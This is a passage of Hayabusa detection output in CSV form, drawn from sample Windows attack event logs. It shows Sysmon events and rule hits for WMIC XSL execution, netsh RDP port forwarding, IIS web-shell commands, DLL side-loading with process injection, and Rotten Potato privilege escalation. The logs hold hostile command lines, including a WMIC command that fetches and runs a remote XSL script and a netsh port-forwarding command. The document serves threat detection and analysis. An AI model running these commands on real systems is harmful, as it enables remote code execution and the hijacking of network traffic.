+09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx 2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx 2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx 2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx 2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 